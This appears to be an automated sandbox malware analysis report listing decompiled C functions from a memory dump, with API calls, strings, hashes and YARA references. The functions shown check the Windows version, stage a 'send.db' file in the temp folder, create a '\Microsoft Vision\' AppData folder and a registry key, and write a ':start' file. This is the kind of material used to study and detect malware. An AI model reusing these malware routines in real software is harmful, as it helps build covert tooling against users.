                                  Function 00410F61, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00410F61() {
				intOrPtr _v6;
				signed int _v12;
				intOrPtr _v272;
				intOrPtr _v280;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t33;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t53;
				intOrPtr _t62;
				_Unknown_base(*)()* _t69;
				void* _t71;

				_v288 = 0x11c;
				_t33 = LoadLibraryA("ntdll.dll");
				if(_t33 == 0) {
					L3:
					_t71 = 2;
					if(_v272 != _t71) {
						goto L43;
					} else {
						_t35 = _v6;
						if(_t35 != 1) {
							if(_t35 == 2 || _t35 == 3) {
								if(_v284 != 5) {
									if(_v284 != 6) {
										if(_v284 != 0xa || _v280 != 0) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x2710;
										}
									} else {
										_t38 = _v280;
										if(_t38 != 0) {
											if(_t38 != 1) {
												if(_t38 != _t71) {
													if(_t38 != 3) {
														goto L43;
													} else {
														return (_v12 & 0x0000ffff) + 0x189c;
													}
												} else {
													return (_v12 & 0x0000ffff) + 0x1838;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x17d4;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x1770;
										}
									}
								} else {
									if(_v280 != 1) {
										if(_v280 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x1450;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x13ec;
									}
								}
							} else {
								goto L43;
							}
						} else {
							if(_v284 != 5) {
								if(_v284 != 6) {
									if(_v284 != 0xa || _v280 != 0) {
										goto L43;
									} else {
										return (_v12 & 0x0000ffff) + 0x3e8;
									}
								} else {
									_t53 = _v280;
									if(_t53 != 0) {
										if(_t53 != 1) {
											if(_t53 != _t71) {
												if(_t53 != 3) {
													goto L43;
												} else {
													return (_v12 & 0x0000ffff) + 0x276;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x26c;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x262;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x258;
									}
								}
							} else {
								_t62 = _v280;
								if(_t62 != 0) {
									if(_t62 != 1) {
										if(_t62 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x208;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x1fe;
									}
								} else {
									return (_v12 & 0x0000ffff) + 0x1f4;
								}
							}
						}
					}
				} else {
					_t69 = GetProcAddress(_t33, "RtlGetVersion");
					if(_t69 == 0) {
						L43:
						return 0;
					} else {
						 *_t69( &_v288);
						goto L3;
					}
				}
			}
















                                  0x00410f6f
                                  0x00410f79
                                  0x00410f81
                                  0x00410fa0
                                  0x00410fa2
                                  0x00410fa9
                                  0x00000000
                                  0x00410faf
                                  0x00410faf
                                  0x00410fb4
                                  0x00411073
                                  0x00411084
                                  0x004110b4
                                  0x00411101
                                  0x00000000
                                  0x0041110c
                                  0x00411116
                                  0x00411116
                                  0x004110b6
                                  0x004110b6
                                  0x004110be
                                  0x004110ce
                                  0x004110dd
                                  0x004110ed
                                  0x00000000
                                  0x004110ef
                                  0x004110f9
                                  0x004110f9
                                  0x004110df
                                  0x004110e9
                                  0x004110e9
                                  0x004110d0
                                  0x004110da
                                  0x004110da
                                  0x004110c0
                                  0x004110ca
                                  0x004110ca
                                  0x004110be
                                  0x00411086
                                  0x0041108d
                                  0x004110a0
                                  0x00000000
                                  0x004110a2
                                  0x004110ac
                                  0x004110ac
                                  0x0041108f
                                  0x00411099
                                  0x00411099
                                  0x0041108d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00410fba
                                  0x00410fc1
                                  0x00411002
                                  0x00411053
                                  0x00000000
                                  0x00411066
                                  0x00411070
                                  0x00411070
                                  0x00411004
                                  0x00411004
                                  0x0041100c
                                  0x0041101c
                                  0x0041102b
                                  0x0041103b
                                  0x00000000
                                  0x00411041
                                  0x0041104b
                                  0x0041104b
                                  0x0041102d
                                  0x00411037
                                  0x00411037
                                  0x0041101e
                                  0x00411028
                                  0x00411028
                                  0x0041100e
                                  0x00411018
                                  0x00411018
                                  0x0041100c
                                  0x00410fc3
                                  0x00410fc3
                                  0x00410fcb
                                  0x00410fdb
                                  0x00410fea
                                  0x00000000
                                  0x00410ff0
                                  0x00410ffa
                                  0x00410ffa
                                  0x00410fdd
                                  0x00410fe7
                                  0x00410fe7
                                  0x00410fcd
                                  0x00410fd7
                                  0x00410fd7
                                  0x00410fcb
                                  0x00410fc1
                                  0x00410fb4
                                  0x00410f83
                                  0x00410f89
                                  0x00410f91
                                  0x00411117
                                  0x0041111a
                                  0x00410f97
                                  0x00410f9e
                                  0x00000000
                                  0x00410f9e
                                  0x00410f91

                                  APIs
                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410F79
                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410F89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RtlGetVersion$ntdll.dll
                                  • API String ID: 2574300362-1489217083
                                  • Opcode ID: 0b4d11267f930e399cf0cd0a18d96ed91b6d59d4babc8823783d36d27fe86c1a
                                  • Instruction ID: 559b4bd9e640983aade5312b2b5afba222edb0c69bc3aa9439dd4f75701b01ff
                                  • Opcode Fuzzy Hash: 0b4d11267f930e399cf0cd0a18d96ed91b6d59d4babc8823783d36d27fe86c1a
                                  • Instruction Fuzzy Hash: 16413830E0016CAADF248B55DC473FEB6B49B1A74DF0004E6E745E1691E27CCEC5CA58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004152FD, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E004152FD(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				signed int _v28;
				char _v32;
				short _v2080;
				void* _t42;
				void* _t47;

				_t42 = __edx;
				 *((intOrPtr*)(__ebx + 0x46183c1)) =  *((intOrPtr*)(__ebx + 0x46183c1)) + __ecx;
				_t47 = __ecx;
				E00401052( &_v2080, 0, 0x400);
				GetTempPathW(0x400,  &_v2080);
				lstrcatW( &_v2080, L"send.db");
				_t48 = _t47 + 4;
				E00403549(_t47 + 4, E004036F7( &_v8,  &_v2080));
				E00405FEB(_v8);
				_t12 =  &_v28;
				_v28 = _v28 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v32 = 0x35;
				asm("movups [ebp-0x14], xmm0");
				E0040378B(E00403873( &_v32, _t42, _t48),  *_t12, _a4);
				E00403777( &_v32);
				return _a4;
			}









                                  0x004152fd
                                  0x004152ff
                                  0x00415321
                                  0x00415323
                                  0x00415333
                                  0x00415345
                                  0x00415351
                                  0x00415360
                                  0x00415368
                                  0x00415370
                                  0x00415370
                                  0x00415377
                                  0x0041537a
                                  0x00415382
                                  0x0041538d
                                  0x00415395
                                  0x004153a0

                                  APIs
                                  • GetTempPathW.KERNEL32(00000400,?), ref: 00415333
                                  • lstrcatW.KERNEL32 ref: 00415345
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                  • String ID: 5$send.db
                                  • API String ID: 891666058-2022884741
                                  • Opcode ID: 4fb5218cdf70102b7336957f834fab734f9ae27b016b5c812372c3844ad99268
                                  • Instruction ID: d0947e770b90053afdf585e4db67557909fa3e1f37a5b6bb773202aecca51e71
                                  • Opcode Fuzzy Hash: 4fb5218cdf70102b7336957f834fab734f9ae27b016b5c812372c3844ad99268
                                  • Instruction Fuzzy Hash: 59115E71D40119ABCB10EBA1DC46FEE7BBCAF50349F00807AB405B6191EB789B468BD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00415307, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E00415307(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v8;
				signed int _v28;
				char _v32;
				short _v2080;
				void* _t35;
				void* _t37;

				_t35 = __edx;
				_t37 = __ecx;
				E00401052( &_v2080, 0, 0x400);
				GetTempPathW(0x400,  &_v2080);
				lstrcatW( &_v2080, L"send.db");
				_t38 = _t37 + 4;
				E00403549(_t37 + 4, E004036F7( &_v8,  &_v2080));
				E00405FEB(_v8);
				_t8 =  &_v28;
				_v28 = _v28 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v32 = 0x35;
				asm("movups [ebp-0x14], xmm0");
				E0040378B(E00403873( &_v32, _t35, _t38),  *_t8, _a4);
				E00403777( &_v32);
				return _a4;
			}









                                  0x00415307
                                  0x00415321
                                  0x00415323
                                  0x00415333
                                  0x00415345
                                  0x00415351
                                  0x00415360
                                  0x00415368
                                  0x00415370
                                  0x00415370
                                  0x00415377
                                  0x0041537a
                                  0x00415382
                                  0x0041538d
                                  0x00415395
                                  0x004153a0

                                  APIs
                                  • GetTempPathW.KERNEL32(00000400,?), ref: 00415333
                                  • lstrcatW.KERNEL32 ref: 00415345
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                  • String ID: 5$send.db
                                  • API String ID: 891666058-2022884741
                                  • Opcode ID: 58727b8c4540086e507ea86442bc3ba18e17fd027ee75a42045624fd60953c6a
                                  • Instruction ID: b9129dd2177f5d91cb3c2605560a9b03bc3764b0432bab46560860ad6b854e10
                                  • Opcode Fuzzy Hash: 58727b8c4540086e507ea86442bc3ba18e17fd027ee75a42045624fd60953c6a
                                  • Instruction Fuzzy Hash: E1013C71D40119ABCB10EB61DC46FEE7BBCAF54309F00807AB505B2191EB789B468BD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041579A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E0041579A(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _v28;
				char _v32;
				short _v552;
				void* _t41;
				void* _t42;
				void* _t45;

				_t41 = __edx;
				 *((intOrPtr*)(__ebx - 0x74aa3c3f)) =  *((intOrPtr*)(__ebx - 0x74aa3c3f)) + __ecx + 1;
				_v8 = 0;
				E00401052( &_v552, 0, 0x208);
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552, _t42, _t45);
				lstrcatW( &_v552, L"\\Microsoft Vision\\");
				E0040357C( &_v8, _t41, 0,  &_v552);
				_v32 = 0x3b;
				asm("xorps xmm0, xmm0");
				_v28 = 0;
				asm("movups [ebp-0x14], xmm0");
				E0040378B(E00403873( &_v32, _t41,  &_v8), 0, _a4);
				E00403777( &_v32);
				E00405FEB(_v8);
				return _a4;
			}










                                  0x0041579a
                                  0x0041579d
                                  0x004157ba
                                  0x004157bd
                                  0x004157d1
                                  0x004157e3
                                  0x004157f3
                                  0x004157fe
                                  0x00415805
                                  0x00415808
                                  0x0041580f
                                  0x0041581a
                                  0x00415822
                                  0x0041582a
                                  0x00415834

                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004157D1
                                  • lstrcatW.KERNEL32 ref: 004157E3
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FolderFreePathVirtuallstrcat
                                  • String ID: ;$\Microsoft Vision\
                                  • API String ID: 1529938272-253167065
                                  • Opcode ID: e1f543ee66d075d9957e2bbf340ec3783308addc8351dc4c6c8c35eeb8be1d21
                                  • Instruction ID: bab513efa4ed7bf9b340fce4efe21c66aceecf9db260b5e240e0963f2cc01e74
                                  • Opcode Fuzzy Hash: e1f543ee66d075d9957e2bbf340ec3783308addc8351dc4c6c8c35eeb8be1d21
                                  • Instruction Fuzzy Hash: 5F115EB1C40119AACB10EFA1DD49EEFBFB8EF19344F1041AAF505B2091DB38AB45CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004157A1, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 66%
                                  			E004157A1(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _v28;
				char _v32;
				short _v552;
				void* _t34;

				_t34 = __edx;
				_v8 = 0;
				E00401052( &_v552, 0, 0x208);
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552);
				lstrcatW( &_v552, L"\\Microsoft Vision\\");
				E0040357C( &_v8, _t34, 0,  &_v552);
				_v32 = 0x3b;
				asm("xorps xmm0, xmm0");
				_v28 = 0;
				asm("movups [ebp-0x14], xmm0");
				E0040378B(E00403873( &_v32, _t34,  &_v8), 0, _a4);
				E00403777( &_v32);
				E00405FEB(_v8);
				return _a4;
			}








                                  0x004157a1
                                  0x004157ba
                                  0x004157bd
                                  0x004157d1
                                  0x004157e3
                                  0x004157f3
                                  0x004157fe
                                  0x00415805
                                  0x00415808
                                  0x0041580f
                                  0x0041581a
                                  0x00415822
                                  0x0041582a
                                  0x00415834

                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004157D1
                                  • lstrcatW.KERNEL32 ref: 004157E3
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FolderFreePathVirtuallstrcat
                                  • String ID: ;$\Microsoft Vision\
                                  • API String ID: 1529938272-253167065
                                  • Opcode ID: ae987deb636bde6e6a9704bff2257c3adb5749e056cb561f849882f6733134c3
                                  • Instruction ID: 19a63838f8e1e6d763b3ca3dd868f266859aef75a557a0161fa2b0bf50ee1775
                                  • Opcode Fuzzy Hash: ae987deb636bde6e6a9704bff2257c3adb5749e056cb561f849882f6733134c3
                                  • Instruction Fuzzy Hash: D70109B1C40119AACB10EBA1DD49EEFBBBCAF18344F10416AB505A2191EB78AB45CBD4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412F0D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412F0D(void* __ecx) {
				char _v8;
				short* _t10;

				_t1 =  &_v8; // 0x41306c
				_t10 = L"SOFTWARE\\Microsoft\\Control Panel\\";
				if(RegOpenKeyExW(0x80000001, _t10, 0, 0xf003f, _t1) == 2) {
					_t2 =  &_v8; // 0x41306c
					RegCreateKeyExW(0x80000001, _t10, 0, 0, 0, 0xf003f, 0, _t2, 0);
				}
				_t3 =  &_v8; // 0x41306c
				return  *_t3;
			}





                                  0x00412f14
                                  0x00412f20
                                  0x00412f35
                                  0x00412f38
                                  0x00412f47
                                  0x00412f47
                                  0x00412f4d
                                  0x00412f54

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,000F003F,l0A,00000000,767182ED,766F13E0,?,?,0041306C), ref: 00412F2C
                                  • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,00000000,00000000,000F003F,00000000,l0A,00000000,?,?,0041306C), ref: 00412F47
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateOpen
                                  • String ID: SOFTWARE\Microsoft\Control Panel\$l0A
                                  • API String ID: 436179556-2156092134
                                  • Opcode ID: 41a7bdf9e1d41e79d9f51368af4def5ee5f15e3bf49717f06ad0d9e1a1792ddf
                                  • Instruction ID: 1f16a589a04c443d12bfafe5dd9e5f2cbd84612a4648573e2ca0ed0d46f4e2df
                                  • Opcode Fuzzy Hash: 41a7bdf9e1d41e79d9f51368af4def5ee5f15e3bf49717f06ad0d9e1a1792ddf
                                  • Instruction Fuzzy Hash: 71E0ED76505128FE972086969D88DEB7EBCDB8A7F4F204066FA09E2101D1619E40D5F4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004133B6, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E004133B6(CHAR* __ecx, void* __edx, long _a4) {
				long _v8;
				int _t4;
				void* _t13;
				void* _t16;

				_push(__ecx);
				_t13 = __edx;
				_v8 = 0;
				_t4 = CreateFileA(__ecx, 0x40000000, 0, 0, 2, 0, 0);
				_t16 = _t4;
				if(_t16 != 0xffffffff) {
					WriteFile(_t16, _t13, _a4,  &_v8, 0);
					_t4 = CloseHandle(_t16);
				}
				return _t4;
			}







                                  0x004133b9
                                  0x004133bf
                                  0x004133cd
                                  0x004133d0
                                  0x004133d6
                                  0x004133db
                                  0x004133e7
                                  0x004133ee
                                  0x004133ee
                                  0x004133f8

                                  APIs
                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004133D0
                                  • WriteFile.KERNEL32(00000000,?,74A313FB,00000000,00000000), ref: 004133E7
                                  • CloseHandle.KERNEL32(00000000), ref: 004133EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleWrite
                                  • String ID: :start
                                  • API String ID: 1065093856-1299720186
                                  • Opcode ID: 3d2162933828df349b03da93c148e200b4ff5639908ee332fc5800b7b2fee1ec
                                  • Instruction ID: 7381dbcee1bd032b03ad7134698835e658c032dc0f213ba1ed2ce9562faf62e4
                                  • Opcode Fuzzy Hash: 3d2162933828df349b03da93c148e200b4ff5639908ee332fc5800b7b2fee1ec
                                  • Instruction Fuzzy Hash: 01E092B2105218BFE3111B99AC89DEB7A7CDB893B9F108175FA25A2190D6304E0146B8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004109ED, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E004109ED() {
				intOrPtr _v6;
				char _v288;
				struct HINSTANCE__* _t4;
				intOrPtr _t5;
				_Unknown_base(*)()* _t9;

				_v288 = 0x11c;
				_t4 = LoadLibraryA("ntdll.dll");
				if(_t4 == 0) {
					L3:
					_t5 = _v6;
					if(_t5 == 2 || _t5 == 3) {
						return 1;
					} else {
						goto L5;
					}
				} else {
					_t9 = GetProcAddress(_t4, "RtlGetVersion");
					if(_t9 == 0) {
						L5:
						return 0;
					} else {
						 *_t9( &_v288);
						goto L3;
					}
				}
			}








                                  0x004109fb
                                  0x00410a05
                                  0x00410a0d
                                  0x00410a28
                                  0x00410a28
                                  0x00410a2d
                                  0x00410a3b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00410a0f
                                  0x00410a15
                                  0x00410a1d
                                  0x00410a33
                                  0x00410a36
                                  0x00410a1f
                                  0x00410a26
                                  0x00000000
                                  0x00410a26
                                  0x00410a1d

                                  APIs
                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410A05
                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410A15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RtlGetVersion$ntdll.dll
                                  • API String ID: 2574300362-1489217083
                                  • Opcode ID: 689f10ae6fce4d2fbcb04405c68690ba6ec8dc2e0aa7fc0cba4dbc559f6b806c
                                  • Instruction ID: 1834724eec8d6658835532cdcab9f2cbecedca635d1db10f1c6d2903e3c751bb
                                  • Opcode Fuzzy Hash: 689f10ae6fce4d2fbcb04405c68690ba6ec8dc2e0aa7fc0cba4dbc559f6b806c
                                  • Instruction Fuzzy Hash: 5AE0923178034856CB385B745D1BBDB7BE85F12745F4444A5E182E1280EAB8C9C2CA98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410A3C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00410A3C() {
				intOrPtr _v272;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t8;

				_v288 = 0x11c;
				_t5 = LoadLibraryA("ntdll.dll");
				if(_t5 == 0) {
					L3:
					if(_v272 != 2) {
						goto L5;
					} else {
						return _v284;
					}
				} else {
					_t8 = GetProcAddress(_t5, "RtlGetVersion");
					if(_t8 == 0) {
						L5:
						return 0;
					} else {
						 *_t8( &_v288);
						goto L3;
					}
				}
			}








                                  0x00410a4a
                                  0x00410a54
                                  0x00410a5c
                                  0x00410a77
                                  0x00410a7e
                                  0x00000000
                                  0x00410a80
                                  0x00410a87
                                  0x00410a87
                                  0x00410a5e
                                  0x00410a64
                                  0x00410a6c
                                  0x00410a88
                                  0x00410a8b
                                  0x00410a6e
                                  0x00410a75
                                  0x00000000
                                  0x00410a75
                                  0x00410a6c

                                  APIs
                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410A54
                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410A64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RtlGetVersion$ntdll.dll
                                  • API String ID: 2574300362-1489217083
                                  • Opcode ID: 83fdeb69c615f76a33d2da629a34f9320cc4150906f67b16e4d4081adeff4d7f
                                  • Instruction ID: 148d00e3e7ffb053b7c10c9a99ab11a5aecab5e32aa73cb5a336ee4092301f00
                                  • Opcode Fuzzy Hash: 83fdeb69c615f76a33d2da629a34f9320cc4150906f67b16e4d4081adeff4d7f
                                  • Instruction Fuzzy Hash: 43E0123068031C56CB349B71AC0AADB77B45B12745F4085E5E245E2180EAB8CDC68FD4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004121DC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 40%
                                  			E004121DC(intOrPtr* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t6;
				intOrPtr* _t12;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t12 = __ecx;
				_t6 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t6 != 0) {
					 *_t6( *_t12,  &_v8);
				}
				return _v8;
			}






                                  0x004121df
                                  0x004121e0
                                  0x004121ef
                                  0x004121f8
                                  0x00412200
                                  0x00412208
                                  0x00412208
                                  0x0041220f

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 004121F1
                                  • GetProcAddress.KERNEL32(00000000), ref: 004121F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: IsWow64Process$kernel32
                                  • API String ID: 1646373207-3789238822
                                  • Opcode ID: cb2be5f3c5e82971b4ce5ae4e71650c09a6451caba81f111521282c3630b6e13
                                  • Instruction ID: 98e0a5f9caf74d9bea286be05565737d668b157ad2b0005c06096195e846ebc9
                                  • Opcode Fuzzy Hash: cb2be5f3c5e82971b4ce5ae4e71650c09a6451caba81f111521282c3630b6e13
                                  • Instruction Fuzzy Hash: 86E08C32600204FBDB14DBA0EC0AFDE7BB8EB08350B2005A9B501E2050DBB9EE00D698
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D01D, Relevance: 6.3, APIs: 5, Instructions: 92COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E0040D01D(signed int* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t23;
				void* _t33;
				struct _CRITICAL_SECTION* _t43;
				signed int* _t59;
				intOrPtr _t62;
				void* _t66;

				_t45 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				_t43 = __ecx + 0x3d8;
				EnterCriticalSection(_t43);
				_t67 = _t59[0x7b];
				_t62 = _a4;
				if(_t59[0x7b] != 0) {
					L2:
					_t69 = _t59[3];
					if(_t59[3] != 0) {
						L5:
						_t63 =  &(_t59[0xf1]);
						_t22 = E004021ED( &(_t59[0xf1]), 0);
						__eflags = _t22;
						if(_t22 == 0) {
							E00401F98(_t63);
						}
						_t23 = E004021ED( &(_t59[0xf3]), 0);
						__eflags = _t23;
						if(_t23 == 0) {
							E00401F98( &(_t59[0xf3]));
						}
						_v12 = _t59[4];
						_v8 = _t59[0x7c];
						E00401F6D(_t63, E0040CF43,  &_v12);
						E00401F6D( &(_t59[0xf3]), E0040CFB0,  &_v12);
						 *_t59 = 1;
						LeaveCriticalSection(_t43);
						E004021ED( &(_t59[0xf1]), 0xffffffff);
						E004021ED( &(_t59[0xf3]), 0xffffffff);
						EnterCriticalSection(_t43);
						 *_t59 =  *_t59 & 0x00000000;
						LeaveCriticalSection(_t43);
						E0040D1C8(_t59);
						_t33 = 0;
						__eflags = 0;
					} else {
						E00403507(_t66, _t62);
						if(E0040594B( &(_t59[1]), _t69, _t45,  *((intOrPtr*)(_t62 + 4))) != 0) {
							goto L5;
						} else {
							goto L4;
						}
					}
				} else {
					E00403507(_t66, _t62 + 8);
					if(E0040594B( &(_t59[0x79]), _t67,  &(_t59[0x79]),  *((intOrPtr*)(_t62 + 0xc))) == 0) {
						L4:
						LeaveCriticalSection(_t43);
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}












                                  0x0040d01d
                                  0x0040d020
                                  0x0040d021
                                  0x0040d025
                                  0x0040d027
                                  0x0040d02e
                                  0x0040d034
                                  0x0040d03b
                                  0x0040d03e
                                  0x0040d05e
                                  0x0040d05e
                                  0x0040d062
                                  0x0040d08b
                                  0x0040d08b
                                  0x0040d095
                                  0x0040d09a
                                  0x0040d09c
                                  0x0040d0a0
                                  0x0040d0a0
                                  0x0040d0ad
                                  0x0040d0b2
                                  0x0040d0b4
                                  0x0040d0bc
                                  0x0040d0bc
                                  0x0040d0c6
                                  0x0040d0cf
                                  0x0040d0db
                                  0x0040d0ef
                                  0x0040d0fb
                                  0x0040d101
                                  0x0040d10b
                                  0x0040d118
                                  0x0040d11e
                                  0x0040d124
                                  0x0040d128
                                  0x0040d12c
                                  0x0040d131
                                  0x0040d131
                                  0x0040d064
                                  0x0040d06b
                                  0x0040d07a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040d07a
                                  0x0040d040
                                  0x0040d04a
                                  0x0040d05c
                                  0x0040d07c
                                  0x0040d07d
                                  0x0040d085
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040d05c
                                  0x0040d137

                                  APIs
                                  • EnterCriticalSection.KERNEL32(?), ref: 0040D02E
                                  • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0040D07D
                                    • Part of subcall function 00403507: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,00402BD2,?,?,00000000,exit,00000000,start), ref: 0040352C
